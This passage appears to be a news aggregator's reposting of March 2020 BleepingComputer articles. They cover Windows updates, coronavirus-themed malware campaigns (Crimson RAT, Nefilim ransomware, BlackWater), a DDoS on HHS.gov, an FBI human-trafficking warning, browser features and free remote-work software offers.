Addresses an issue that causes high CPU utilization when retrieving a session object.
Addresses high latency in Active Directory Federation Services (AD FS) response times for globally distributed datacenters in which SQL might be on a remote datacenter.
Improves the performance for all token requests coming to AD FS, including OAuth, Security Assertion Markup Language (SAML), WS-Federation, and WS-Trust.
Addresses a high latency issue in acquiring OAuth tokens when AD FS front-end servers and back-end SQL servers are in different datacenters.
Restores the constructed attribute in Active Directory and Active Directory Lightweight Directory Services (AD LDS) for msDS-parentdistname.
Addresses an issue to prevent SAML errors and the loss of access to third-party apps for users who do not have multi-factor authentication (MFA) enabled.
Addresses an issue with evaluating the compatibility status of the Windows ecosystem to help ensure application and device compatibility for all updates to Windows.
Addresses an issue that prevents Microsoft User Experience Virtualization (UE-V) settings from roaming to enable the signature files that are used for new messages, forwarded messages, and replies.
Addresses an issue with high CPU usage on AD FS servers that occurs when the backgroundCacheRefreshEnabled feature is enabled.
Addresses an issue that creates the Storage Replica administrator group with the incorrect SAM-Account-Type and Group-Type. This makes the Storage Replica administrator group unusable when moving the primary domain controller (PDC) emulator.
Addresses an issue that prevents some machines from automatically going into Sleep mode under certain circumstances because of Microsoft Defender Advanced Threat Protection (ATP) Auto Incident Response (IR).
Addresses an issue that prevents some machines from running Microsoft Defender ATP Threat & Vulnerability Management successfully.
Improves support for non-ASCII file paths for Microsoft Defender ATP Auto IR.
Addresses an issue that, in some scenarios, causes stop error 0xEF while upgrading to Windows 10, version 1809.

Microsoft is aware of at least one known issue in this update where some Asian language packs installed may receive the error, "0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND."

Microsoft says it's working on a resolution and it will provide an update in a future release.

One billion devices
Earlier this week, Microsoft revealed that Windows 10 is now being actively used on 1 billion devices every month. The operating system was released in the second half of 2015 and it took nearly five years for Windows 10 to become active on 1 billion devices.

"New Windows 10 features and security updates are now delivered faster than ever before. We’ve evolved from releasing a version every three years, to releasing multiple versions per year. And with the recent decoupling of the new Chromium-based Edge browser from Windows 10 we can now deliver new builds to customers outside of the normal Windows 10 release cadence—and to more versions of Windows," said Yusuf Mehdi, Corporate Vice President, Modern Life, Search & Devices at Microsoft.


Nation-Backed Hackers Spread Crimson RAT via Coronavirus Phishing
21.3.2020 
Bleepingcomputer  APT  Phishing  Virus 

A state-sponsored threat actor is attempting to deploy the Crimson Remote Administration Tool (RAT) onto the systems of targets via a spear-phishing campaign using Coronavirus-themed document baits disguised as health advisories.

This nation-backed cyber-espionage is suspected to be Pakistan-based and it is currently tracked under multiple names including APT36, Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

The group, active since at least 2016, is known for targeting Indian defense and government entities and for stealing sensitive info designed to bolster Pakistan's diplomatic and military efforts.

Coronavirus-themed spear-phishing campaign
APT36's ongoing spear-phishing attacks were first spotted by researchers with QiAnXin's RedDrip Team who discovered malicious documents camouflaged as health advisories and impersonating Indian government officials.

The spear-phishing emails, attributed by the Chinese researchers to the Transparent Tribe hacking group and also analyzed by Malwarebytes Labs' Threat Intelligence Team, are trying to trick the targets into enabling macros so that the Crimson RAT payload can be deployed.

APT36 uses two lure formats in this campaign: Excel documents with embedded malicious macros and RTF documents files designed to exploit the CVE-2017-0199 Microsoft Office/WordPad remote code execution vulnerability.

Fake Coronavirus health advisory
Fake Coronavirus health advisory (Malwarebytes Labs)
Once the malicious documents used as baits are opened and the malicious macros are executed, a 32-bit or a 64-bit version of the Crimson RAT payload will be dropped based on the victim's OS type.

After the device is compromised, the attackers can perform a wide range of data theft tasks including but not limited to:

• Stealing credentials from the victim’s browser
• Listing running processes, drives, and directories on the victim’s machine
• Retrieving files from its C&C server
• Using custom TCP protocol for its C&C communications
• Collecting information about antivirus software
• Capturing screenshots

After being executed, the Crimson RAT will automatically connect to the hardcoded command-and-control addresses and send all the collected info on the victim, including the list of running processes, the machine's hostname, and the currently logged in username.

"APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT," Malwarebytes says.

"In past campaigns, they were able to compromise Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters.

"They also were able to steal personal data, such as passport scans and personal identification documents, text messages, and contact details."

State-backed groups behind other Coronavirus-themed attacks
APT36 is not the only nation-sponsored threat actor known for using COVID-19-themed malware and phishing emails to attack and infect potential targets.

Chinese APTs (Mustang Panda and Vicious Panda), North Korean APTs (Kimsuky), Russian APTs (Hades and TA542), as well as some without known affiliations such as SWEED have also been recently adopting Coronavirus baits as part of their attacks as recently reported by ZDNet.

Cybercriminals with no nation-state ties have also been playing the Coronavirus card heavily trying to monetize on their targets' COVID-19 fears.

Phishing campaigns using Coronavirus baits have targeted US and UK targets since the start of February, impersonating U.S. Centers for Disease Control and Prevention (CDC) officials and virologists.

New malware strains have also been spotted since the Coronavirus started, such as new ransomware called CoronaVirus used as a cover for the Kpot Infostealer, a Remote Access Trojan (RAT), a Trojan, a stealer/keylogger, and even a wiper.

The World Health Organization (WHO) also warned of active Coronavirus-themed phishing attacks impersonating WHO officials with the end goal of delivering malware and stealing the targets' sensitive information.

Last but not least, Ancient Tortoise BEC fraudsters have also been seen sending scam emails attempting to use the Coronavirus outbreak as cover for them updating payment information on invoices to bank accounts under their control.


Microsoft Edge to Let You Set Custom Backgrounds for New Tabs
21.3.2020 
Bleepingcomputer  OS

Microsoft is testing the ability to add set a custom background image for the new tab page in Microsoft Edge Canary build 82.0.457.0.

For those who are using the latest Microsoft Edge Canary build, Microsoft is conducting a limited test that allows you to change the background image to one of your choosing.

To change to a custom desktop background, you would open a new tab page, click on the Settings cog, and then select Custom. If you are part of the test, you will be able to see an option to set the background to "Your own image" as shown below.

Setting a custom background in Microsoft Edge
Setting a custom background in Microsoft Edge
You will then be prompted to select an image that you want to be used as the background for the new tab page.

Below you can see a custom background that BleepingComputer applied to the new tab page.

Microsoft Edge using a custom background for the NTP
Microsoft Edge using a custom background for the NTP
As already stated, this feature is currently only available to those whose Edge clientID has been added to this test.


New Nefilim Ransomware Threatens to Release Victims' Data
21.3.2020 
Bleepingcomputer  Ransomware

A new ransomware called Nefilim that shares much of the same code as Nemty has started to become active in the wild and threatens to release stolen data.

Nefilim became active at the end of February 2020 and while it not known for sure how the ransomware is being distributed, it is most likely through exposed Remote Desktop Services.

Head of SentinelLabs Vitali Krimez and ID Ransomware's Michael Gillespie both told BleepingComputer that Nefilim and Nemty 2.5 share much of the same code.

The main difference is that Nefilim has removed the Ransomware-as-a-Service (RaaS) component and now relies on email communications for payments rather than a Tor payment site.

It is not known if this is a fork of their ransomware from the original operators or if new threat actors obtained the source code to release a new version.

Nefilim threatens to release data
In the Nefilim ransom note, the attackers state that if a user does not pay the ransom in seven days they will release data that was stolen from the network.

A large amount of your private files have been extracted and is kept in a secure location.
If you do not contact us in seven working days of the breach we will start leaking the data.
After you contact us we will provide you proof that your files have been extracted.

In the past, this would have been seen as an empty threat, but with ransomware infections such as Maze, Sodinokibi, DoppelPaymer, and Nemty all following through with their threats, it should no longer be ignored.

The Nefilim encryption process
When encrypting files, Nefilim will encrypt a file using AES-128 encryption. This AES encryption key will then be encrypted by an RSA-2048 public key that is embedded in the ransomware executable.

This encrypted AES key will then be added to the contents of each encrypted file and can only be decrypted by the RSA private key known to the ransomware developers.

For each encrypted file, Nefilim will append the .NEFILIM extension to the file name. For example, a file called 1.doc would be encrypted and named 1.doc.NEFILIM.

Files encrypted by the Nefilim Ransomware
Files encrypted by the Nefilim Ransomware
In addition to the encrypted AES key, the ransomware will also add the "NEFILIM" string as a file marker to all encrypted files as shown below.

NEFILIM file marker
NEFILIM file marker
When done, a ransom note named NEFILIM-DECRYPT.txt will be created throughout the system that contains instructions on how to contact the ransomware developers.

This ransom note contains different contact emails and the threat that they will leak data if a ransom is not paid within seven days of the "breach".

Caption
Unfortunately, a brief analysis by Gillespie indicates that this ransomware appears to be secure, which means that there is no current way to recover files for free.

The ransomware, though, is still being researched and if new weaknesses we will publish updated information.


US Democratic Party Symbol Changed to a Rat in Google Search
21.3.2020 
Bleepingcomputer  BigBrothers

The election symbol of the US Democratic Party has been changed to a rat within the Google search knowledge panel that shows when searching for the party's name, instead of the usual donkey-themed one.

While no one knows how this happened, the new rat-themed symbol displayed when searching for "democratic party" on Google is now automatically loaded from a post made by a now-banned user on a history forum in January.

US Democratic Party Symbol Changed to a Rat in Google Search
US Democratic Party Symbol Changed to a Rat in Google Search
The rat election symbol is currently being shown for all search results that show the Democratic Party symbol.

The Republican Party symbol remains unchanged for now. but does display the changed Democratic Party symbol in the bottom of their knowledge panel.

Republican Party Knowledge Panel
Republican Party Knowledge Panel
Researchers from cybersecurity intelligence company Under the Breach, who first discovered this change, say it is unclear how this was done.

BleepingComputer has reached out to Google for comment but had not heard back at the time of this publication. This article will be updated when a response is received.

This is a developing story ...

H/T Under the Breach

Update March 16, 18:41 EDT: "Most images in Knowledge Panels are automatically generated from pages on the web," a Google spokesperson told BleepingComputer.

"When errors are reported, we fix them quickly. We encourage people and organizations to claim their Knowledge Panels, which allows them to select a representative image."

The Democratic Party rat election symbol was automatically displayed in the Knowledge Panel based on a web source and Google will remove it since the image is not representative to the entity.


Google Chrome 82 to Enhance Privacy via New Cookie Settings
21.3.2020 
Bleepingcomputer  Privacy

Google is making progress on expanding the control users have over cookies in the Chrome browser with a new flag in Canary that enables an improved interface with more buttons and information.

The experimental feature is available in the Android version 82 of the browser and adds two more options for cookie management.

No 3rd-party cookies in incognito mode
In the current configuration of Chrome 80 stable for all supported platforms, you can allow/block cookies on all sites or just block third-party ones. The latter comes with the warning that some sites may not work properly when the restriction is active.

The new Cookies user interface in Canary for Android shows four controls instead of just two currently available in the stable version of the browser and there is a brief description for cookie data:

"Cookies are files created by websites you visit. Sites use them to remember your preferences. Third-party cookies are created by other sites. These sites own some of the content, like ads or images, that you see on the webpage you visit."

One option that becomes available when enabling the experimental feature can prevent websites from reading and saving cookie data when browsing in incognito mode.

A browsing session in incognito mode starts with a blank internal profile void of cookies or session data but get added when you visit websites. They do not affect the normal browsing session and are purged when closing the last incognito window.

The other option allows you to block all cookies. This is not a recommended option, though, since it will likely impact your experience on many websites.


The option to add sites that are exempt from the active setting is still available below the buttons.

The flag that enables the four buttons is called "Enable improved cookie controls in UI in incognito mode." You can look for it in the 'chrome://flags' experimental area.


You can also find the experimental flag in the current stable version of Chrome but it appears that the new Cookie menu does not activate with it.


Windows 10 2004 to Upgrade WSL2 Linux Kernels via Windows Update
21.3.2020 
Bleepingcomputer  OS

Microsoft has announced that the upcoming Windows 10 2004 release will also include Windows Subsystem for Linux 2 (WSL 2) whose Linux kernel will be kept updated via Windows Update.

When Microsoft announced WSL2, they explained that all WSL2 distributions would use a real Microsoft-compiled Linux kernel based on the stable 4.19 version release of Linux at Kernel.org.

Starting with Windows 10 2004, which is expected to be released shortly, and in the latest Windows 10 Insider build 19041.153, when using WSL2 the Linux kernel will first need to be upgraded.

After upgrading, when you attempt to convert a WSL distribution to WSL2 or to launch an existing WSL2 distro, Windows 10 will prompt you to first update to the latest Linux kernel by displaying the following message.

"WSL 2 requires an update to its kernel component. For information please visit https://aka.ms/wsl2kernel"

Prompt to update Windows Linux kernel
Prompt to update Windows Linux kernel
For now, Windows 10 users will need to manually download and install the latest WSL 2 kernel using these instructions.

At this time, after installing the available Linux kernel update, WSL 2 distributions will be using the following kernel:

Linux version 4.19.84-microsoft-standard (oe-user@oe-host) (gcc version 8.2.0 (GCC)) #1 SMP Wed Nov 13 11:44:37 UTC 2019
In a future update to Windows 10 2004, though, Microsoft plans on distributing new WSL 2 kernels via Windows Update.

Similar to Windows Defender updates and Security Intelligence definition updates, if a new Linux kernel is available it will be downloaded when a user checks for new updates via Windows Update.

"If you’ve ever gone to your Windows settings, and clicked ‘Check for Updates’ you might have seen some other items being updated like Windows Defender malware definitions, or a new touchpad driver, etc. The Linux kernel in WSL2 will now be serviced in this same method, which means you’ll get the latest kernel version independently of consuming an update to your Windows image," Microsoft explained in a new blog post.

WSL2 being generally available soon is exciting news for users who use this feature as it brings numerous performance improvements to Windows

As WSL2 uses a true Linux kernel, Linux apps will now have full access to their normal system calls, which will bring increased compatibility with existing Linux apps and greater performance.


FBI Warns of Human Traffickers Luring Victims on Social Networks
21.3.2020 
Bleepingcomputer  BigBrothers

FBI's Internet Crime Complaint Center (IC3) today issued a public service announcement on human traffickers' continued usage of online platforms like dating sites and social networks to lure victims.

"The FBI warns the public to remain vigilant of the threat posed by criminals who seek to traffic individuals through force, fraud, or coercion through popular social media and dating platforms," the PSA says.

"Offenders often exploit dating apps and websites to recruit—and later advertise—sex trafficking victims. In addition, offenders are increasingly recruiting labor trafficking victims through what appears to be legitimate job offers."

Online platforms tools used against vulnerable targets
According to the FBI's investigations, victims from various different backgrounds from rural areas to large cities are being lured by human traffickers into forced labor or sex work using online platforms.

In many cases, the criminals will pose as legitimate job recruiters or agents of employment agencies and will bait potential victims with the promise of fake employment and a better life.

Individuals who share personal information on online platforms are the ones most likely to be targeted by such criminals, especially after posting about "financial hardships, their struggles with low self-esteem, or their family problems."

The traffickers will use their targets' stories as the base for well-planned attacks via the Internet, convincing them that they want to be helpful or that they are interested in a relationship.

However, their victims will subsequently be coerced into sex work or forced labor after the traffickers manage to establish a false sense of trust and they persuade them to meet in person.

Human traffickers using online platforms
During the last few years, the FBI discovered multiple cases of human traffickers using popular social networks and dating sites to recruit victims.

Among the multiple such cases identified over the years, the FBI shares the following three examples:

In July 2019, a Baltimore, Maryland, man was convicted on two counts of sex trafficking of a minor and one count of using the Internet to promote a business enterprise involving prostitution. The perpetrator targeted two girls after they posted information online about their difficult living and financial situation. After meeting them in person, the man forced the two girls into sex work.
In March 2019, a married couple was found guilty of conspiracy to obtain forced labor and two counts of obtaining forced labor. The couple employed foreign workers to perform domestic labor in their home in Stockton, California. The defendants used the Internet and an India-based newspaper to post false advertisements about the wages and nature of the employment at their home. Upon arrival, the workers were forced to work 18-hour days with little to no wages.
In October 2017, a sex trafficker was convicted on 17 counts of trafficking adults and minors. Additional charges included child pornography and obstruction of justice. The perpetrator received a 33-year sentence. A victim from the Seattle area met the sex trafficker's accomplice on a dating website. The trafficker and his accomplice later promised to help the victim with her acting career. After a few months, the victim was abused and forced into prostitution.
Report (potential) trafficking situations
"Human trafficking occurs in every area of the country and occurs in many forms, from forced labor to sexual exploitation, including the sexual exploitation of children," FBI Criminal Investigative Division Section Chief Michael Driscoll said last year.

"The FBI operates Human Trafficking and Child Exploitation Task Forces throughout the country to aggressively investigate the perpetrators and also provides resources to assist the victims of these crimes.”

Victims and those who think that they witnessed a potential human trafficking situation are encouraged by the FBI to contact their local law enforcement agencies, the local FBI field office, or to reach out to:

the National Human Trafficking Hotline—Call 1-888-373-7888 (TTY: 711) or text 233733;
file a complaint online with the FBI's Internet Crime Complaint Center at www.IC3.gov; or
contact the FBI's National Threat Operations Center at 1-800-CALL-FBI or tips.fbi.gov.
To report possible trafficking involving minors, contact the National Center for Missing and Exploited Children (NCMEC) at 1-800-THE-LOST (1-800-843-5678) or at Cybertipline.org.
Victims and witnesses are also urged by the FBI to keep as much evidence as possible including emails, text messages, or any other logs of communication with the traffickers to make it easier to identify, retain, and prosecute them.

"The FBI produced this public service announcement to alert Internet users of the continuing threat posed by human traffickers online and what you should do if you or someone you know suspects human trafficking," the PSA concludes.


U.S. Health Department Site Hit With DDoS Cyber Attack
21.3.2020 
Bleepingcomputer  Attack

The United States Health and Human Services Department's web site was hit with a DDoS cyber attack Sunday night to take it offline in the middle of the Coronavirus outbreak.

Since the COVID-19 outbreak, there has been a tremendous spike in people searching for HHS information about the Coronvirus as shown by the graph below.

Increased searches for HHS.gov site
Increased searches for HHS.gov site
First reported by Bloomberg, attackers on Sunday night attempted to disrupt the dissemination of Coronavirus information by performing a DDoS attack against the HHS.gov web site.

A DDoS attack is when attackers send a huge amount of connections to a web site or IP address at the same time to overwhelm the server so that it is no longer accessible.

"The attack appears to have been intended to slow the agency’s systems down, but didn’t do so in any meaningful way, said the people, who asked for anonymity to discuss an incident that was not public," Bloomberg reported.

Later that night, the National Security Council tweeted an alert to ignore text messages spreading "rumors of a national quarantine" and that there is no national lockdown.

NSC Tweet

According to one of Bloomberg's sources, this tweet was in response to a disinformation campaign being conducted by the attackers in conjunction with the attempt to take down the HHS.gov site.

Government officials are aware of the attack and assume it was a foreign cyber attack, but have not been able to confirm that at this time.

"Secretary of State Michael Pompeo and other Trump administration officials are aware of the incident, one of the people said," Bloomberg continued.

Coronavirus related cyber attacks becoming common
Whenever a world event brings panic and anxiety, criminals attempt to take advantage of the situation.

Such is the case with the Coronavirus where we are seeing related phishing campaigns, malware and ransomware, and cyber attacks against hospitals and testing centers.

This past Friday, the University Hospital Brno in the Czech Republic was shut down due to a cyber attack that started in the early morning hours.

This hospital hosts one of the 18 labs used to test for the Coronavirus and was performing 20 tests a day until the attack.


Windows 10 KB4551762 Security Update Fails to Install, Causes Issues
21.3.2020 
Bleepingcomputer  OS

The Windows 10 KB4551762 security update is reportedly failing to install and throwing 0x800f081f, 0x80004005, 0x80073701, 0x800f0988, 0x80071160, and 0x80240016 errors during the installation process according to user reports.

KB4551762 is an out of band security update released by Microsoft last week to patch the critical remote code execution vulnerability (CVE-2020-0796) affecting devices running Windows 10, versions 1903 and 1909, and Windows Server Server Core installations, versions 1903 and 1909.

To install KB4551762, you can check for updates via Windows Update or manually downloading it for your Windows version from the Microsoft Update Catalog. Admins can distribute the update to enterprise environments via Windows Server Update Services (WSUS).

If you have automatic updates enabled on your device, the update will install automatically and you do not need to take any further action.


Usual workarounds not working
While usually there is a workaround to install the update manually or by going through a specific procedure when encountering errors, this time users who have encountered these issues (1, 2, 3, 4, 5, 6, 7) report via Microsoft's official Feedback Hub, on the Microsoft Community website, and on Reddit that none of the usual workarounds for the errors helped.

0x800f0988 and 0x800f0900 installation errors were also spotted and reported by Günter Born, one day after KB4551762 was released by Microsoft.

"Manual Windows Update on the local client works ONCE. It finds the patch, then does nothing! One can attempt to download and install from that page, but it doesn't work! Next, go to the Catalog," one user reported through Microsoft's Feedback Hub. "Attempt to select the correct configuration. Download the patch. Attempt to install it. Doesn't install!"

"When downloading this update my PC started becoming slow and sluggish, the update got stuck at 100%," another one reported. "I restarted the PC then windows updates broke and started looping for a while when checking updates, its now back to normal but now I have a failed cumulative update."

"So I've had this issue since KB4497165, but the latest KB4551762 is also giving me the same problem," another one said on Reddit. "Basically after it installs, it gets to 7% on the "working on updates" part, then tells me that it failed, and it's undoing changes."

Feedback Hub KB4551762 user reports
Feedback Hub KB4551762 reportsFeedback Hub KB4551762 reports
Feedback Hub KB4551762 reports
Also plagued by CPU spikes, random restarts, boot failures
Other reports, although not as numerous as the ones saying that KB4551762 comes packed with installation issues, mention CPU spikes, high disk usage, system slowdowns, and system freezes.

"These issues began yesterday 3/13/20. The update, '2020-03 Cumulative Update for Windows 10 Version 1909 for x64-based Systems (KB4551762)' has failed every time I try to install it with the error code, '0x80071160', one user says. "When this issue began my disk drive also went up to 100% with little change. I restarted my pc multiple times but both issues persisted."

"After installing KB4551762 and KB4540673, my system has gone to thrash. Extremely slow and takes ages to get past the Welcome screen," another one explains. "After spending hours trying to login, I somehow managed to uninstall both the updates, rebooted, disabled and re-enabled HyperV but my system won't go back to being normal."

"Simply downloading the update caused my computer to overheat and freeze multiple times," a bug report on the Feedback Hub says. "Finally, with no programs open in the background, the download was able to go through. When I attempted to restart so the update could take effect, it would get stuck at 93% installing the update. Always stuck at 93%."

To top it all off, there are also reports of random restarts or failures to boot, as well as users who are having gaming issues after installing KB4551762 with the monitor starting to flicker after a game starts and the issue going away after closing the game.

Windows 10 in-place upgrade: a potential solution
While the KB4551762 installation issues are quite widespread according to users, there are some who have successfully managed to deploy the security update using a Windows 10 in-place upgrade.

Using this method you will be able to clean-up your system to resolve some issues, and it should not affect your programs and files.

The procedure is detailed in the video embedded below and it requires you to download and install the Windows 10 installation media, sign in to your account, and accept privacy settings. Additionally, you will need admin rights to upgrade.


Verily Coronavirus Screening Site Launches, Quickly Runs Out of Slots
21.3.2020 
Bleepingcomputer  Security
Project Baseline

Verily has launched its Project Baseline Coronavirus screening site for people living in the San Francisco Bay Area that lets people check if they need a test and where to get one.

This new site is being launched by Verily, an Alphabet company and sister company to Google, and allows only those people living in the Bay Area to enter their symptoms, recent travel, and other information to determine if a Coronavirus test is necessary.

COVID-19 Screening site
COVID-19 Screening site
This site is only available for residents living in Santa Clara County and San Mateo County with the hopes of eventually expanding to other locations in the future.

Using this site, though, does have some requirements such as being 18 or older, a U.S. Resident, living in one of the two counties, able to speak and read English, and willing to sign a COVID-19 Public Health authorization form.

Screening requirements
Screening requirements
Initially announced as a Google nationwide testing site by President Trump during a Friday press conference, it was quickly clarified as being only available to Bay Area residents.

Since then, Google has announced that they will be working with the U.S. government to release a nationwide site for Coronavirus information.

There is no timeline yet as to when this nationwide site will become available.

Testing appointments quickly run out
Since launching late last night, the screening site's available appointment slots quickly ran out.

When users start the screening process and specify they live in the required regions, the site will immediately state "Unfortunately, we are unable to schedule more appointments at this time. Appointments will continue to expand through this program as we scale capacity in the near future."

Appointments run out

BleepingComputer has contacted Verily for more information about how many people scheduled appointments and when more slots would be available but have not heard back as of yet.


Xbox Live and Support.xbox.com Experiencing an Outage
21.3.2020 
Bleepingcomputer  IT

Microsoft is currently experiencing an outage where some users are unable to login to Xbox Live, have issues with matchmaking, and are unable to access support.xbox.com.

At approximately 5:00 PM EST, users started reporting that they were unable to login to Xbox Live, access their saved games, or have issues with matchmaking. Since then, users have also been having issues opening support.xbox.com.

Microsoft has confirmed these issues in the Xbox Support Twitter account as can be seen below.

Tweet about Xbox Live being down
Tweet about Xbox Live being down
Tweet about support.xbox.com being down
Tweet about support.xbox.com being down
When users try to access support.xbox.com, they will simply be greeted with the animated Xbox loading circle as seen below.

Support.xbox.com outage
Support.xbox.com outage
At approximately 7:30 PM EST, service was restored for both Xbox Live and support.xbox.com


Folding@Home Now Has 23 Coronavirus Projects, Donate CPU Power!
21.3.2020 
Bleepingcomputer  IT

The Folding@home distributed computing project has added twenty new Coronavirus (COVID-19) projects since earlier this week that uses donated CPU or GPU power to research new treatment methods.

Folding@home allows researchers to use donated CPU and GPU cycles to simulate protein folding to research new drug opportunities against diseases and a greater understanding of various diseases.

Last week, we reported that the Folding@home added three new projects (11741, 11742, and 11743) that were being used to research the COVID-19 virus and how to create potential drug therapies

Since we last looked on March 9th, 2020, researchers from Memorial Sloan Kettering Cancer Center, Washington University in St. Louis, and Temple University have added 20 new projects, for a total of 23, that are all being used to analyze the proteins of Coronavirus virus.

"To help tackle coronavirus, we want to understand how these viral proteins work and how we can design therapeutics to stop them," Folding@home's announcement stated.

The Current Folding@home project IDs that correspond with Coronavirus (COVID-19) research are 11741, 11742, 11743, 11744, 11745, 11746, 11747, 11748, 11749, 11750, 11751, 11752, 11759, 11760, 11761, 11762, 11763, 11764, 14328, 14329, 14530, 14531, and 14532.

Getting started with Folding@home
To get started with Folding@home, download the Folding@home client and install it.

Once installed, Folding@home will automatically be configured to lightly use your computer's CPU and GPU processing power to perform protein-folding when you log into Windows. A GPU will only be used if it's hardware and software is supported.

If you wish to increase the amount of CPU and GPU utilization, you can right-click on the Folding@home icon in your Windows system and select either from 'Light', 'Medium', or 'Full'.

It should be noted that the higher the intensity you select, the slower your computer will become, the more heat it will generate, and the more electricity it will use.

Folding@home options
Folding@home options
If you want to check what project you are currently working on or change some of the program's settings via a web GUI, you can select the 'Web Control' option as shown in the image above.

This will open a web page showing your current work-in-progress, your settings, and the project ID you are currently working on. To support Coronavirus projects, make sure to support research fighting 'Any Disease'.

Folding@Home
Folding@Home
After determining the project ID number, you can look up the project ID you are working on here. For example, in the image above you can see that the project ID is 14329, which is for Coronavirus/COVID-19 research.

The Folding@home project has said that due to the increasing interest in the project and CPU and GPU cycles being donated, it may take some time before you receive a job to work on.

"Each simulation you run is like buying a lottery ticket. The more tickets we buy, the better our chances of hitting the jackpot. Usually, your computer will never be idle, but we’ve had such an enthusiastic response to our COVID-19 work that you will see some intermittent downtime as we sprint to setup more simulations. Please be patient with us! There is a lot of valuable science to be done, and we’re getting it running as quickly as we can," Folding@home stated.

If you have an idle computer sitting around doing nothing, please contribute it to the project. Who knows, the data you are assigned and solve could be what helps to create a cure!


List of Free Software and Services During Coronavirus Outbreak
15.3.2020 
Bleepingcomputer  IT

In response to the Coronavirus (COVID-19) outbreak, many organizations are asking their employees to work remotely. This, though, brings new challenges to the workplace as users adapt to video meetings, screen sharing, and the use of remote collaboration tools.

To assist a new wave of remote works and get some publicity at the same time, many software developers and service providers have started to offer free licenses or enhanced versions of their software and services.

Below is a roundup of all the free upgrades to services and software licenses being offered during the Coronavirus outbreak.

If you are a software developer or technology service provider and would like to add any free offers to this list, please contact us and let us know.

AT&T
According to a report by Vice, AT&T is suspending broadband data caps during the Coronavirus outbreak.

AT&T is the first major ISP to confirm that it will be suspending all broadband usage caps as millions of Americans bunker down in a bid to slow the rate of COVID-19 expansion. Consumer groups and a coalition of Senators are now pressuring other ISPs to follow suit.

Cisco
Cisco is changing its free Webex meeting software so that it supports unlimited usage, supports up to 100 people per meeting, and has toll dial-in availability.

For businesses that are not currently a customer, Cisco is also offering free 90-day trials.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost."

Cloudflare
Cloudflare has made its Cloudflare for Teams service free for small businesses for at least six months.

"Beginning today, we are making our Cloudflare for Teams products free to small businesses around the world. Teams enables remote workers to operate securely and easily. We will continue this policy for at least the next 6 months."

Using Cloudflare for Teams, remote workers can gain access to a company's internal resources using a secure VPN.

Discord
Discord has enhanced its free Go Live streaming service so that it can now support 50 simultaneous users rather than 10.

"We wanted to find a way to help, so we’re temporarily upping the limit on Go Live to 50 people at a time, up from 10. Go Live is free to use and lets people privately stream or screen share apps from a computer while others watch on any device — so teachers can conduct a class, co-workers can collaborate, and groups can still meet. You can learn more about how to get started with Go Live here," Discord stated in a blog post.

Google
Google is giving G Suite and G Suite for Education customers free access to their Hangouts Meet video-conferencing features.

This includes these features:

Larger meetings, for up to 250 participants per call
Live streaming for up to 100,000 viewers within a domain
The ability to record meetings and save them to Google Drive
Instant Housecall
Subscribers to Instant Housecall can now create subaccounts that allow remote workers to take over their office PC. This offer will be available until the World Health Organization (WHO) designates the end of the pandemic.

"All plans now include subaccounts that let your customers work remotely. Using a subaccount that you create, your customers can login and control their own unattended PC," the announcement states.

Logmein
LogMeIn is providing a free Emergency Remote Work Kit that gives free 3-month site-wide licenses to GoToMeeting to make it easier for remote workers to conduct meetings.

"Starting immediately, we will be offering our critical front-line service providers with free, organization-wide use of many LogMeIn products for 3 months through the availability of Emergency Remote Work Kits. These kits will include solutions for meetings and video conferencing, webinars and virtual events, IT support and management of remote employee devices and apps, as well as remote access to devices in multiple locations. For example, the “Meet” Emergency Remote Work Kit will provide eligible organizations with a free site-wide license of GoToMeeting for 3 months," LogMeIn CEO Bill Wagnar said in a blog post.

Loom
The Loom video messaging platform has announced that through July 1st, 2020 they will provide these additional features:

Remove the recording limit on our free plan — what was 25 is now unlimited
Cut the price of Loom Pro in half — what was $10/month is now $5/month
Extend all trials of Loom Pro from 14 to 30 days
Microsoft
Microsoft is making Microsoft Teams for free for the next six months to aid businesses who move towards a remote workplace during the outbreak.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority. By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier," Microsoft EVP and President JP Courtois stated on Twitter.

Splashtop
Splashtop is offering free 60-day licenses to its Business Access remote access software.

"In response to the recent coronavirus outbreak, many organizations, businesses, educational institutions, and governments are recommending that people work from home to help reduce the spread of the virus. To support these remote work initiatives, Splashtop is offering its Splashtop Business Access remote computer access software free for 60 days in some of the most affected countries.

Residents of China, Hong Kong, Macau, and Taiwan are eligible for the free license,"

TechSmith
TechSmith is giving free licenses to their TechSmith Snagit screen capture software and the TechSmith Video Review software through June 30th, 2020.

"Our screen recording tool, TechSmith Snagit, and our asynchronous collaboration platform, TechSmith Video Review, will be provided for free through the end of June 2020 to any organization that needs it," TechSmith announced.

For existing customers of the TechSmith Relay or Video Review products, TechSmith is providing free increased usage with no charge.

Zoho
Zoho is now offering free access to its Remotely remote work software suite through July 1st, 2020.

"Zoho Remotely will enable you to take your work remote by offering a complete suite of web and mobile apps that will help you communicate, collaborate and be productive."

Zoom
For people in China, Zoom has enhanced the Basic (free) license by removing the 40-minute meeting limit.

With this tenet in mind, Zoom is doing everything we can to provide resources and support to those navigating the coronavirus outbreak, including:

For our Basic (free) users in China, we’ve lifted the 40-minute limit on meetings with more than two participants, providing unlimited time to collaborate.
We’re proactively monitoring servers to ensure maximum reliability amid any capacity increases, as uptime is paramount.
We’re scheduling informational sessions and on-demand resources so anyone can learn how to use the Zoom platform with ease — and at their convenience.


BlackWater Malware Abuses Cloudflare Workers for C2 Communication
15.3.2020 
Bleepingcomputer  Virus

A new backdoor malware called BlackWater pretending to be COVID-19 information while abusing Cloudflare Workers as an interface to the malware's command and control (C2) server.

Cloudflare Workers are JavaScript programs that run directly on Cloudflare's edge so that they can interact with connections from remote web clients. These Workers can be used to modify the output of a web site behind Cloudflare, disable Cloudflare features, or even act as independent JavaScript programs running on the edge that displays output.

For example, a Cloudflare Worker can be created to search for text in a web server's output and replace words in it or to simply output data back to a web client.

BlackWater uses Cloudflare Workers as a C2 interface
Recently MalwareHunterTeam discovered a RAR file being distributed pretending to be information about the Coronavirus (COVID-19) called "Important - COVID-19.rar".

It is not known at this time how the file is being distributed, but it is most likely being done through phishing emails.

